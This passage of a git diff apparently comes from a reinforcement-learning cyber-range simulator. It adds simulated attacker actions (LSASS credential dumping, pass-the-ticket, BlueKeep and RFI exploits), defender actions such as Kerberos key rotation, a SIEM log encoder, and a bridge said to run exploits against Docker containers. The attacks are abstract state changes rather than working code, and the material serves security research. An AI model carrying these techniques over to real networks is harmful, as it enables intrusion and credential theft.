diff --git a/netforge_rl/actions/__init__.py b/netforge_rl/actions/__init__.py
index 6796da0..b6652f0 100644
--- a/netforge_rl/actions/__init__.py
+++ b/netforge_rl/actions/__init__.py
@@ -11,6 +11,9 @@
DecoyTomcat,
Misinform,
ConfigureACL,
+ SecurityAwarenessTraining,
+ DeployHoneytoken,
+ RotateKerberos,
)
from .red import (
NetworkScan,
@@ -27,6 +30,11 @@
KillProcess,
ShareIntelligence,
OverloadPLC,
+ SpearPhishing,
+)
+from .red.post_exploitation import (
+ DumpLSASS,
+ PassTheTicket,
)
__all__ = [
@@ -42,6 +50,9 @@
'DecoyTomcat',
'Misinform',
'ConfigureACL',
+ 'SecurityAwarenessTraining',
+ 'DeployHoneytoken',
+ 'RotateKerberos',
'NetworkScan',
'DiscoverRemoteSystems',
'DiscoverNetworkServices',
@@ -56,11 +67,7 @@
'KillProcess',
'ShareIntelligence',
'OverloadPLC',
- 'SecurityAwarenessTraining',
- 'DeployHoneytoken',
+ 'SpearPhishing',
+ 'DumpLSASS',
+ 'PassTheTicket',
]
-
-from .blue import SecurityAwarenessTraining
-from .blue import DeployHoneytoken
-
-__all__.extend(['SecurityAwarenessTraining', 'DeployHoneytoken'])
diff --git a/netforge_rl/actions/blue/__init__.py b/netforge_rl/actions/blue/__init__.py
index 5f82275..ca59a0c 100644
--- a/netforge_rl/actions/blue/__init__.py
+++ b/netforge_rl/actions/blue/__init__.py
@@ -31,4 +31,7 @@
'ConfigureACL',
'SecurityAwarenessTraining',
'DeployHoneytoken',
+ 'RotateKerberos',
]
+
+from .identity import RotateKerberos
diff --git a/netforge_rl/actions/blue/identity.py b/netforge_rl/actions/blue/identity.py
new file mode 100644
index 0000000..2d97424
--- /dev/null
+++ b/netforge_rl/actions/blue/identity.py
@@ -0,0 +1,89 @@
+import random
+import string
+from netforge_rl.core.action import BaseAction, ActionEffect
+from netforge_rl.core.registry import action_registry
+
+
+@action_registry.register('RotateKerberos', 'blue')
+class RotateKerberos(BaseAction):
+ """
+ Apex Zero-Trust Action: Rotates Domain Kerberos TGT Keys globally.
+ This invalidates all currently held Enterprise Admin tokens, severing Red's ZTNA lateral movement.
+ It impacts the entirely network graph, but burns significant Business Downtime.
+ """
+
+ def __init__(self, agent_id: str, target_ip: str):
+ # target_ip is effectively ignored since this is a global action, but retained for API parity.
+ super().__init__(agent_id, target_ip)
+ self.duration = 4
+ self.compute_cost = 80
+
+ def validate(self, global_state) -> bool:
+ # Global action; validate the blue agent has enough funds (highly expensive)
+ if self.agent_id in global_state.agent_funds:
+ if global_state.agent_funds[self.agent_id] < 5000:
+ return False
+ return True
+
+ def execute(self, global_state) -> ActionEffect:
+ class RotateKerberosCommand:
+ def __init__(self, agent_id):
+ self.agent_id = agent_id
+
+ def execute(self, state):
+ # 1. Burn the massive funding cost
+ if self.agent_id in state.agent_funds:
+ state.agent_funds[self.agent_id] -= 5000
+ state.business_downtime_score += 1500.0
+
+ # 2. Flush all Red Agent Inventories globally
+ for agent in state.agent_inventory:
+ state.agent_inventory[agent].clear()
+
+ # 3. Generate a new valid Domain Token string
+ random_suffix = ''.join(
+ random.choices(string.ascii_uppercase + string.digits, k=6)
+ )
+ new_token = f'Enterprise_Admin_Token_{random_suffix}'
+
+ # 4. Migrate the global environment physics to require the NEW token
+ for host in state.all_hosts.values():
+ # Update what the host requires
+ if 'Enterprise_Admin_Token' in host.system_tokens:
+ host.system_tokens.remove('Enterprise_Admin_Token')
+ host.system_tokens.append(new_token)
+
+ # Also update wildcard tokens from any previous rotations
+ old_tokens = [
+ t
+ for t in host.system_tokens
+ if t.startswith('Enterprise_Admin_Token_')
+ ]
+ for t in old_tokens:
+ host.system_tokens.remove(t)
+ host.system_tokens.append(new_token)
+
+ # Update what the Domain Controllers hold in memory
+ if 'Enterprise_Admin_Token' in host.cached_credentials:
+ host.cached_credentials.remove('Enterprise_Admin_Token')
+ host.cached_credentials.append(new_token)
+
+ old_cache = [
+ t
+ for t in host.cached_credentials
+ if t.startswith('Enterprise_Admin_Token_')
+ ]
+ for t in old_cache:
+ host.cached_credentials.remove(t)
+ host.cached_credentials.append(new_token)
+
+ deltas = {'identity_flush': RotateKerberosCommand(self.agent_id)}
+
+ return ActionEffect(
+ success=True,
+ state_deltas=deltas,
+ observation_data={
+ 'alert': 'CRITICAL: Global Domain Keys Rotated. Enterprise Network re-verified.'
+ },
+ eta=self.duration,
+ )
diff --git a/netforge_rl/actions/red/__init__.py b/netforge_rl/actions/red/__init__.py
index 5e754e1..692be29 100644
--- a/netforge_rl/actions/red/__init__.py
+++ b/netforge_rl/actions/red/__init__.py
@@ -26,6 +26,9 @@
'ShareIntelligence',
'OverloadPLC',
'SpearPhishing',
+ 'DumpLSASS',
+ 'PassTheTicket',
]
from .social_engineering import SpearPhishing
+from .post_exploitation import DumpLSASS, PassTheTicket
diff --git a/netforge_rl/actions/red/exploits.py b/netforge_rl/actions/red/exploits.py
index 786eee0..051174f 100644
--- a/netforge_rl/actions/red/exploits.py
+++ b/netforge_rl/actions/red/exploits.py
@@ -44,7 +44,7 @@ def validate(self, global_state) -> bool:
"""
if not super().validate(global_state):
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
import random
@@ -53,21 +53,37 @@ def execute(self, global_state) -> ActionEffect:
if not host or not host.vulnerabilities:
return ActionEffect(success=False, state_deltas=[], observation_data={})
- # CVSS-Weighted Stochastics (1.0 = 100% success on 10.0 CVSS, 0.2 = 20% on 2.0 CVSS)
- cvss = getattr(host, 'cvss_score', 5.0) # Default average vulnerability logic
- probability_of_success = cvss / 10.0
-
- if host.decoy == 'active' or random.random() > probability_of_success:
- return ActionEffect(
- success=False,
- state_deltas=[],
- observation_data={
- 'failed_exploit': self.target_ip,
- 'reason': 'stochastic_cvss_failure',
- },
+ # --- Sim2Real Bridge dispatch ---
+ bridge = getattr(global_state, 'sim2real_bridge', None)
+ if bridge is not None:
+ hw_result = bridge.dispatch(
+ 'ExploitRemoteService', self.target_ip, getattr(host, 'os', 'Unknown')
)
+ reward_delta = bridge.reward_delta(hw_result)
+ if not hw_result.success:
+ return ActionEffect(
+ success=False,
+ state_deltas=[],
+ observation_data={
+ 'failed_exploit': self.target_ip,
+ 'reason': 'sim2real_failure',
+ 'sim2real_stdout': hw_result.stdout,
+ 'sim2real_reward_delta': reward_delta,
+ 'sim2real_latency_ms': hw_result.latency_ms,
+ },
+ )
+ else:
+ # Fallback: CVSS-weighted random roll (legacy training path)
+ cvss = getattr(host, 'cvss_score', 5.0)
+ if host.decoy == 'active' or random.random() > cvss / 10.0:
+ return ActionEffect(
+ success=False,
+ state_deltas=[],
+ observation_data={'failed_exploit': self.target_ip},
+ )
+ hw_result = None
+ reward_delta = 0.0
- # Build OOP Delta List
deltas = [
UpdateHostPrivilegeCommand(
self.target_ip, 'User', compromised_by=self.agent_id
@@ -79,6 +95,9 @@ def execute(self, global_state) -> ActionEffect:
'exploit': self.target_ip,
'status': 'User_Access_Gained',
'active_session_established': True,
+ 'sim2real_stdout': hw_result.stdout if hw_result else None,
+ 'sim2real_reward_delta': reward_delta,
+ 'sim2real_latency_ms': hw_result.latency_ms if hw_result else None,
}
return ActionEffect(
@@ -122,19 +141,10 @@ def validate(self, global_state) -> bool:
"""
if not super().validate(global_state):
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
- """Completes the pre-auth RCE and commits the privilege transformation
-
- delta. Fails if target is patched against CVE-2019-0708.
-
- Args:
- global_state: Simulator context.
-
- Returns:
- ActionEffect: System delta upgrading access rights to 'User'.
- """
+ """Completes the pre-auth RCE. Uses Sim2RealBridge when available."""
import random
host = global_state.all_hosts.get(self.target_ip)
@@ -147,19 +157,39 @@ def execute(self, global_state) -> ActionEffect:
},
)
- roll = random.random()
- if roll < 0.15:
- return ActionEffect(
- success=False,
- state_deltas={},
- observation_data={'exploit': 'failed silently'},
- )
- elif roll < 0.25:
- return ActionEffect(
- success=False,
- state_deltas={f'hosts/{self.target_ip}/status': 'kernel_panic'},
- observation_data={'exploit': 'failed - kernel panic'},
+ # --- Sim2Real Bridge dispatch ---
+ bridge = getattr(global_state, 'sim2real_bridge', None)
+ if bridge is not None:
+ hw_result = bridge.dispatch(
+ 'ExploitBlueKeep', self.target_ip, getattr(host, 'os', 'Unknown')
)
+ reward_delta = bridge.reward_delta(hw_result)
+ if not hw_result.success:
+ return ActionEffect(
+ success=False,
+ state_deltas={},
+ observation_data={
+ 'exploit': 'BlueKeep failed',
+ 'sim2real_stdout': hw_result.stdout,
+ 'sim2real_reward_delta': reward_delta,
+ },
+ )
+ else:
+ roll = random.random()
+ if roll < 0.15:
+ return ActionEffect(
+ success=False,
+ state_deltas={},
+ observation_data={'exploit': 'failed silently'},
+ )
+ elif roll < 0.25:
+ return ActionEffect(
+ success=False,
+ state_deltas={f'hosts/{self.target_ip}/status': 'kernel_panic'},
+ observation_data={'exploit': 'failed - kernel panic'},
+ )
+ hw_result = None
+ reward_delta = 0.0
return ActionEffect(
success=True,
@@ -167,7 +197,11 @@ def execute(self, global_state) -> ActionEffect:
f'hosts/{self.target_ip}/privilege': 'User',
f'hosts/{self.target_ip}/compromised_by': self.agent_id,
},
- observation_data={'exploit': 'BlueKeep success'},
+ observation_data={
+ 'exploit': 'BlueKeep success',
+ 'sim2real_stdout': hw_result.stdout if hw_result else None,
+ 'sim2real_reward_delta': reward_delta,
+ },
)
@@ -206,7 +240,7 @@ def validate(self, global_state) -> bool:
"""
if not super().validate(global_state):
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
"""Calculates impact deltas following the SMB buffer overflow
@@ -282,20 +316,11 @@ def validate(self, global_state) -> bool:
"""Requires valid routing to the web interface."""
if not super().validate(global_state):
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
- """Executes the RFI request. Automatically evaluates failure states if
-
- interacting with simulated High-Interaction Honeypots (e.g.,
- DecoyApache, DecoyTomcat).
-
- Args:
- global_state (GlobalNetworkState): State snapshot.
-
- Returns:
- ActionEffect: Success logic containing failure telemetry if targeting a Decoy,
- else structural access upgrades to 'User'.
+ """Executes the RFI request. Uses Sim2RealBridge when available.
+ Automatically fails against honeypot decoys.
"""
host = global_state.all_hosts.get(self.target_ip)
if host and host.decoy in ['Apache', 'Tomcat', 'active']:
@@ -305,11 +330,36 @@ def execute(self, global_state) -> ActionEffect:
observation_data={'exploit': 'Failed against Decoy'},
)
+ # --- Sim2Real Bridge dispatch ---
+ bridge = getattr(global_state, 'sim2real_bridge', None)
+ if bridge is not None:
+ hw_result = bridge.dispatch(
+ 'ExploitHTTP_RFI', self.target_ip, getattr(host, 'os', 'Unknown')
+ )
+ reward_delta = bridge.reward_delta(hw_result)
+ if not hw_result.success:
+ return ActionEffect(
+ success=False,
+ state_deltas={},
+ observation_data={
+ 'exploit': 'HTTP_RFI failed',
+ 'sim2real_stdout': hw_result.stdout,
+ 'sim2real_reward_delta': reward_delta,
+ },
+ )
+ else:
+ hw_result = None
+ reward_delta = 0.0
+
return ActionEffect(
success=True,
state_deltas={
f'hosts/{self.target_ip}/privilege': 'User',
f'hosts/{self.target_ip}/compromised_by': self.agent_id,
},
- observation_data={'exploit': 'HTTP_RFI success'},
+ observation_data={
+ 'exploit': 'HTTP_RFI success',
+ 'sim2real_stdout': hw_result.stdout if hw_result else None,
+ 'sim2real_reward_delta': reward_delta,
+ },
)
diff --git a/netforge_rl/actions/red/impact.py b/netforge_rl/actions/red/impact.py
index 604a730..b29df18 100644
--- a/netforge_rl/actions/red/impact.py
+++ b/netforge_rl/actions/red/impact.py
@@ -69,7 +69,7 @@ def validate(self, global_state) -> bool:
Validates target reachability. Usually requires the host to be directly routable
or already compromised in practice.
"""
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
"""
@@ -97,7 +97,7 @@ def validate(self, global_state) -> bool:
host = global_state.all_hosts.get(self.target_ip)
if not host or host.privilege not in ['User', 'Root']:
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
from netforge_rl.core.commands import ConsumeBandwidthCommand
diff --git a/netforge_rl/actions/red/kinetic.py b/netforge_rl/actions/red/kinetic.py
index f70bb2e..8fbf31e 100644
--- a/netforge_rl/actions/red/kinetic.py
+++ b/netforge_rl/actions/red/kinetic.py
@@ -41,7 +41,7 @@ def validate(self, global_state) -> bool:
if host.privilege != 'Root':
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
import random
diff --git a/netforge_rl/actions/red/post_exploitation.py b/netforge_rl/actions/red/post_exploitation.py
new file mode 100644
index 0000000..30b0d59
--- /dev/null
+++ b/netforge_rl/actions/red/post_exploitation.py
@@ -0,0 +1,128 @@
+from netforge_rl.core.action import BaseAction, ActionEffect
+from netforge_rl.core.registry import action_registry
+
+
+@action_registry.register('DumpLSASS', 'red')
+class DumpLSASS(BaseAction):
+ """
+ Advanced Post-Exploitation Action: Scrapes memory for Active Directory tokens.
+ Requires the Red Agent to have 'Root' privileges on the target Windows node.
+ """
+
+ def __init__(self, agent_id: str, target_ip: str):
+ super().__init__(agent_id, target_ip)
+ self.duration = 2
+ self.compute_cost = 40
+
+ def validate(self, global_state) -> bool:
+ if not global_state.can_route_to(self.target_ip, agent_id=self.agent_id):
+ return False
+
+ host = global_state.all_hosts.get(self.target_ip)
+ if not host:
+ return False
+
+ # Must have root to touch lsass.exe and must be on a windows machine structurally
+ if host.privilege != 'Root':
+ return False
+
+ return True
+
+ def execute(self, global_state) -> ActionEffect:
+ host = global_state.all_hosts[self.target_ip]
+ if not host.cached_credentials:
+ return ActionEffect(
+ success=False,
+ state_deltas={},
+ observation_data={
+ 'alert': 'LSASS dumped, but no credentials found in memory.'
+ },
+ eta=self.duration,
+ )
+
+ # We will build a complex Command or just handle the inventory securely
+ class DumpLSASSCommand:
+ def __init__(self, agent_id, stolen_creds):
+ self.agent_id = agent_id
+ self.stolen_creds = stolen_creds
+
+ def execute(self, state):
+ if self.agent_id not in state.agent_inventory:
+ state.agent_inventory[self.agent_id] = set()
+ state.agent_inventory[self.agent_id].update(self.stolen_creds)
+
+ deltas = {
+ 'inventory_update': DumpLSASSCommand(self.agent_id, host.cached_credentials)
+ }
+
+ return ActionEffect(
+ success=True,
+ state_deltas=deltas,
+ observation_data={'alert': 'LSASS dumped successfully.', 'severity': 8},
+ eta=self.duration,
+ )
+
+
+@action_registry.register('PassTheTicket', 'red')
+class PassTheTicket(BaseAction):
+ """
+ Lateral Movement via Identity validation bypassing CVE exploits explicitly.
+ """
+
+ def __init__(self, agent_id: str, target_ip: str):
+ super().__init__(agent_id, target_ip)
+ self.duration = 1
+ self.compute_cost = 10
+
+ def validate(self, global_state) -> bool:
+ # ZTNA constraints inside can_route_to will automatically handle Secure subnet boundary blocks
+ if not global_state.can_route_to(self.target_ip, agent_id=self.agent_id):
+ return False
+
+ host = global_state.all_hosts.get(self.target_ip)
+ if not host:
+ return False
+
+ # Already compromised?
+ if host.privilege == 'Root':
+ return False
+
+ return True
+
+ def execute(self, global_state) -> ActionEffect:
+ host = global_state.all_hosts[self.target_ip]
+ inventory = global_state.agent_inventory.get(self.agent_id, set())
+
+ success = False
+ # To PassTheTicket, the agent must hold ANY of the system's required tokens,
+ # OR the node requires NO tokens (not zero trust).
+ if not host.system_tokens:
+ success = True
+ else:
+ if any(tok in inventory for tok in host.system_tokens):
+ success = True
+
+ if success:
+ deltas = {
+ f'hosts/{self.target_ip}/privilege': 'Root',
+ f'hosts/{self.target_ip}/compromised_by': self.agent_id,
+ }
+ return ActionEffect(
+ success=True,
+ state_deltas=deltas,
+ observation_data={
+ 'alert': 'Auth Token Accepted. Root privileges granted.',
+ 'severity': 4,
+ },
+ eta=self.duration,
+ )
+ else:
+ return ActionEffect(
+ success=False,
+ state_deltas={},
+ observation_data={
+ 'alert': 'Pass-The-Ticket failed (Token Mismatch).',
+ 'severity': 2,
+ },
+ eta=self.duration,
+ )
diff --git a/netforge_rl/actions/red/privilege_escalation.py b/netforge_rl/actions/red/privilege_escalation.py
index 9e195d0..339eac8 100644
--- a/netforge_rl/actions/red/privilege_escalation.py
+++ b/netforge_rl/actions/red/privilege_escalation.py
@@ -29,7 +29,7 @@ def validate(self, global_state) -> bool:
host = global_state.all_hosts.get(self.target_ip)
if not host or host.privilege != 'User':
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
"""Applies the mathematical delta to elevate the agent's privilege
@@ -75,7 +75,7 @@ def validate(self, global_state) -> bool:
return False
if 'Windows' not in host.os:
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
"""Processes the DCOM impersonation attack delta. Fails if target OS is
@@ -129,7 +129,7 @@ def validate(self, global_state) -> bool:
return False
if 'Linux' not in host.os:
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
"""Resolves the exploit outcome altering the target's privilege table.
@@ -187,7 +187,7 @@ def validate(self, global_state) -> bool:
if not has_dc_hash:
return False
- return global_state.can_route_to(self.target_ip)
+ return global_state.can_route_to(self.target_ip, agent_id=self.agent_id)
def execute(self, global_state) -> ActionEffect:
"""Applies instantaneous SYSTEM access based on Golden Ticket leverage.
diff --git a/netforge_rl/core/state.py b/netforge_rl/core/state.py
index 0458575..0939f0e 100644
--- a/netforge_rl/core/state.py
+++ b/netforge_rl/core/state.py
@@ -21,6 +21,9 @@ def __init__(self, ip: str, hostname: str, subnet_cidr: str):
self.contains_honeytokens: bool = (
False # Triggers 100% confidence active deception traps
)
+ # Identity-Driven Zero Trust Networking Arrays
+ self.cached_credentials: list = [] # Dumped via LSASS
+ self.system_tokens: list = [] # Required to breach or ping node natively
def __repr__(self):
return (
@@ -63,6 +66,9 @@ def __init__(self):
# Tracks which IPs each agent currently knows about (Fog of War)
self.agent_knowledge: Dict[str, Set[str]] = {}
+ # Tracks logical identity tokens/hashes stolen during lateral movement (Zero Trust)
+ self.agent_inventory: Dict[str, set] = {}
+
# Tracks remaining energy/budget for temporal action constraints
self.agent_energy: Dict[str, int] = {}
# Advanced Attack Economics Constraints
@@ -146,9 +152,12 @@ def apply_delta(self, delta_key: Any, delta_value: Any = None):
self.action_history[agent_id] = set()
self.action_history[agent_id].add(record)
- def can_route_to(self, target_ip: str, port: int = None) -> bool:
+ def can_route_to(
+ self, target_ip: str, port: int = None, agent_id: str = None
+ ) -> bool:
"""Evaluates complex network topology rules for routing
- reachability and explicit firewall port blocks.
+ reachability and explicit firewall port blocks. Now enforces
+ strict Zero-Trust Identity rules.
"""
if target_ip not in self.all_hosts:
return False
@@ -183,7 +192,19 @@ def can_route_to(self, target_ip: str, port: int = None) -> bool:
)
if target_subnet == '10.0.1.0/24': # Secure
- return has_dmz_pivot or has_corp_pivot
+ if not (has_dmz_pivot or has_corp_pivot):
+ return False
+
+ # ZERO TRUST IDENTITY CHECK
+ # If the Red agent attempts to cross into Secure, they MUST have the Domain Admin Token!
+ if agent_id and agent_id.startswith('red'):
+ agent_hash_inventory = self.agent_inventory.get(agent_id, set())
+ # If ANY token listed in the target's required system_tokens matches the agent's inventory
+ # OR if the target specifically requires 'Enterprise_Admin_Token', verify it.
+ if 'Enterprise_Admin_Token' not in agent_hash_inventory:
+ return False
+
+ return True
return False
diff --git a/netforge_rl/environment/parallel_env.py b/netforge_rl/environment/parallel_env.py
index d44eb96..c6d55c1 100644
--- a/netforge_rl/environment/parallel_env.py
+++ b/netforge_rl/environment/parallel_env.py
@@ -9,6 +9,9 @@
from netforge_rl.environment.base_env import BaseNetForgeRLEnv
from netforge_rl.topologies.network_generator import NetworkGenerator
from netforge_rl.agents.green_agent import GreenAgent
+from netforge_rl.sim2real.bridge import Sim2RealBridge
+from netforge_rl.siem.siem_logger import SIEMLogger
+from netforge_rl.nlp.log_encoder import LogEncoder, EMBEDDING_DIM
class NetForgeRLEnv(BaseNetForgeRLEnv):
@@ -56,7 +59,26 @@ def __init__(self, scenario_config: dict):
self.global_state = self.network_generator.generate()
self.resolution_engine = ConflictResolutionEngine()
+ # Sim2Real Bridge — defaults to 'sim' (mock) for training speed.
+ # Set sim2real_mode='real' in scenario_config for Docker evaluation.
+ sim2real_mode = (
+ scenario_config.get('sim2real_mode', 'sim') if scenario_config else 'sim'
+ )
+ self.sim2real_bridge = Sim2RealBridge(mode=sim2real_mode)
+ self.global_state.sim2real_bridge = self.sim2real_bridge
+
+ # NLP-SIEM Pipeline — stochastic event log generation + encoding.
+ # SIEMLogger converts action effects → Windows Event XML strings.
+ # LogEncoder converts those strings → 128-dim LSTM-compatible vectors.
+ nlp_backend = (
+ scenario_config.get('nlp_backend', 'tfidf') if scenario_config else 'tfidf'
+ )
+ self.siem_logger = SIEMLogger()
+ self.log_encoder = LogEncoder(backend=nlp_backend)
+
# Native Gymnasium Spaces for PettingZoo API + RLlib Mapping
+ # Blue agents receive a 'siem_embedding' key with the encoded SIEM log vector.
+ # Red agents also get the key (zeroed) to keep obs space shapes uniform across agents.
self.observation_spaces = {
agent: gym.spaces.Dict(
{
@@ -65,7 +87,10 @@ def __init__(self, scenario_config: dict):
),
'action_mask': gym.spaces.Box(
low=0, high=1, shape=(62,), dtype=np.int8
- ), # 12 action types + 50 IPs
+ ),
+ 'siem_embedding': gym.spaces.Box(
+ low=-1.0, high=1.0, shape=(EMBEDDING_DIM,), dtype=np.float32
+ ),
}
)
for agent in self.possible_agents
@@ -87,7 +112,11 @@ def reset(
(Gymnasium style + PettingZoo).
"""
+ # Teardown any running containers from the previous episode
+ self.sim2real_bridge.teardown_all()
self.global_state = self.network_generator.generate(seed=seed)
+ # Re-attach bridge to freshly generated state
+ self.global_state.sim2real_bridge = self.sim2real_bridge
self.agents = self.possible_agents[:]
self.global_state.agent_energy = {agent: 50 for agent in self.agents}
self.global_state.agent_funds = {
@@ -95,6 +124,8 @@ def reset(
}
self.global_state.agent_compute = {agent: 1000 for agent in self.agents}
self.global_state.business_downtime_score = 0.0
+ # Clear SIEM log buffer on new episode
+ self.global_state.siem_log_buffer = []
observations = {}
for agent_id in self.agents:
obs = BaseObservation(agent_id)
@@ -102,6 +133,7 @@ def reset(
observations[agent_id] = {
'obs': obs.to_numpy(max_size=256),
'action_mask': self.action_mask(agent_id),
+ 'siem_embedding': np.zeros(EMBEDDING_DIM, dtype=np.float32),
}
self.current_tick = 0
self.event_queue = []
@@ -253,6 +285,38 @@ def step(
self._apply_state_deltas(resolved_effects)
+ # NLP-SIEM: generate structured event logs from resolved action effects
+ for res_agent, res_effect in resolved_effects.items():
+ action_name = type(
+ next(
+ (
+ e['action']
+ for e in self.event_queue
+ if e.get('agent') == res_agent
+ ),
+ None,
+ )
+ or type('', (), {})()
+ ).__name__
+ # Prefer fetching name from the event that just resolved
+ for ev in list(self.event_queue) + [
+ e
+ for e in [
+ {'agent': k, 'action': type('_A', (), {'__name__': 'Unknown'})()}
+ for k in resolved_effects
+ ]
+ ]:
+ if ev.get('agent') == res_agent:
+ action_name = type(ev.get('action', object())).__name__
+ break
+ self.siem_logger.log_action(
+ action_name=action_name,
+ effect=res_effect,
+ global_state=self.global_state,
+ agent_id=res_agent,
+ target_ip=res_effect.observation_data.get('exploit'),
+ )
+
# Generate True Positive telemetry from attacks that hit SIEM
for res_agent, res_effect in resolved_effects.items():
if 'red' in res_agent and res_effect.success:
@@ -282,6 +346,9 @@ def step(
}
)
+ # Generate background SIEM noise every tick
+ self.siem_logger.log_background_noise(self.global_state)
+
observations = {}
rewards = {}
terminate = self.scenario.check_termination(self.global_state)
@@ -293,6 +360,10 @@ def step(
is_truncated = self.current_tick >= self.max_ticks
truncate = {agent: is_truncated for agent in self.agents}
+ # Encode recent SIEM logs once per step (shared cost for all Blue agents)
+ recent_logs = self.siem_logger.get_recent_logs(self.global_state, n=8)
+ siem_vec = self.log_encoder.encode_buffer(recent_logs, agg='mean')
+
for agent in self.agents:
obs = BaseObservation(agent)
obs.update_from_state(self.global_state, resolved_effects)
@@ -302,7 +373,6 @@ def step(
commander_id = agent.replace('operator', 'commander')
if commander_id in agent_actions:
cmd_action = agent_actions[commander_id]
- # Normalize the MultiDiscrete action to a float between 0.0 and 1.0
cmd_val = (
(float(cmd_action[0]) / 12.0)
if getattr(cmd_action, '__iter__', False)
@@ -311,11 +381,18 @@ def step(
)
obs_array[0] = cmd_val
+ # Blue agents receive the live SIEM embedding; Red gets zeros.
+ # This gives Blue an information advantage that models real SOC telemetry.
+ if 'blue' in agent:
+ agent_siem_vec = siem_vec
+ else:
+ agent_siem_vec = np.zeros(EMBEDDING_DIM, dtype=np.float32)
+
observations[agent] = {
'obs': obs_array,
'action_mask': self.action_mask(agent),
+ 'siem_embedding': agent_siem_vec,
}
- # Reward shaping applied here natively factoring in immediate action outcomes
agent_effect = resolved_effects.get(agent)
rewards[agent] = self._calculate_reward(
agent, self.global_state, agent_effect
diff --git a/netforge_rl/nlp/__init__.py b/netforge_rl/nlp/__init__.py
new file mode 100644
index 0000000..782df8d
--- /dev/null
+++ b/netforge_rl/nlp/__init__.py
@@ -0,0 +1,3 @@
+from netforge_rl.nlp.log_encoder import LogEncoder, EMBEDDING_DIM
+
+__all__ = ['LogEncoder', 'EMBEDDING_DIM']
diff --git a/netforge_rl/nlp/log_encoder.py b/netforge_rl/nlp/log_encoder.py
new file mode 100644
index 0000000..5be9a11
--- /dev/null
+++ b/netforge_rl/nlp/log_encoder.py
@@ -0,0 +1,235 @@
+"""
+LogEncoder — NLP encoder for SIEM log strings.
+
+Dual-backend design:
+ - 'tfidf' (default): sklearn TF-IDF → 128-dim L2-normalised vector.
+ Zero extra dependencies. Fast. Good enough for RL training.
+ - 'transformer' (optional): sentence-transformers all-MiniLM-L6-v2 → 384-dim →
+ projected to 128-dim via a learned linear layer.
+ Requires: pip install sentence-transformers torch
+ Use this for evaluation or fine-tuning runs.
+
+Both backends expose the same encode() interface and output a
+float32 numpy array of shape (EMBEDDING_DIM,).
+"""
+
+from __future__ import annotations
+
+import hashlib
+import json
+import logging
+from pathlib import Path
+from typing import Literal
+
+import numpy as np
+
+logger = logging.getLogger(__name__)
+
+EMBEDDING_DIM = 128 # Fixed output dimension for both backends
+
+
+class LogEncoder:
+ """
+ Encodes raw SIEM log strings (Windows Event XML / Sysmon / Metasploit stdout)
+ into dense float32 vectors consumable by the PyTorch LSTM policy.
+
+ The encoder is stateless after __init__ — encode() is pure and thread-safe.
+ An LRU-style string cache avoids re-encoding identical log bursts.
+ """
+
+ def __init__(
+ self,
+ backend: Literal['tfidf', 'transformer'] = 'tfidf',
+ cache_size: int = 512,
+ ) -> None:
+ self.backend = backend
+ self._cache: dict[str, np.ndarray] = {}
+ self._cache_size = cache_size
+ self._encoder = self._build_encoder(backend)
+
+ def encode(self, text: str) -> np.ndarray:
+ """
+ Encode a single SIEM log string to a float32 vector of shape (EMBEDDING_DIM,).
+
+ Returns a zero vector for empty/None inputs.
+ """
+ if not text or not text.strip():
+ return np.zeros(EMBEDDING_DIM, dtype=np.float32)
+
+ # Cache lookup (keyed by first 256 chars — avoids huge key strings)
+ cache_key = hashlib.md5(text[:256].encode()).hexdigest()
+ if cache_key in self._cache:
+ return self._cache[cache_key]
+
+ vec = self._encoder(text)
+ self._evict_if_full()
+ self._cache[cache_key] = vec
+ return vec
+
+ def encode_buffer(self, log_lines: list[str], agg: str = 'mean') -> np.ndarray:
+ """
+ Encode a list of log lines and aggregate them into a single vector.
+
+ Args:
+ log_lines: List of log strings (e.g. last N from siem_log_buffer).
+ agg: Aggregation strategy — 'mean' (default) or 'max'.
+
+ Returns:
+ Aggregated float32 vector of shape (EMBEDDING_DIM,).
+ """
+ if not log_lines:
+ return np.zeros(EMBEDDING_DIM, dtype=np.float32)
+
+ # Normalise: convert legacy dict-format log entries to strings
+ str_lines = [line if isinstance(line, str) else str(line) for line in log_lines]
+ vecs = np.stack([self.encode(line) for line in str_lines])
+ if agg == 'max':
+ return vecs.max(axis=0).astype(np.float32)
+ return vecs.mean(axis=0).astype(np.float32)
+
+ def _build_encoder(self, backend: str):
+ if backend == 'transformer':
+ return self._build_transformer()
+ return self._build_tfidf()
+
+ def _build_tfidf(self):
+ """
+ Build a TF-IDF vectorizer fit on the payload library + event templates corpus.
+ Projects to EMBEDDING_DIM via truncated SVD (Latent Semantic Analysis).
+ """
+ from sklearn.feature_extraction.text import TfidfVectorizer
+ from sklearn.decomposition import TruncatedSVD
+ from sklearn.pipeline import Pipeline
+ from sklearn.preprocessing import Normalizer
+
+ corpus = self._build_training_corpus()
+
+ pipeline = Pipeline(
+ [
+ (
+ 'tfidf',
+ TfidfVectorizer(
+ analyzer='char_wb',
+ ngram_range=(3, 5),
+ max_features=4096,
+ sublinear_tf=True,
+ ),
+ ),
+ ('svd', TruncatedSVD(n_components=EMBEDDING_DIM, random_state=42)),
+ ('norm', Normalizer(norm='l2')),
+ ]
+ )
+ pipeline.fit(corpus)
+ logger.info(
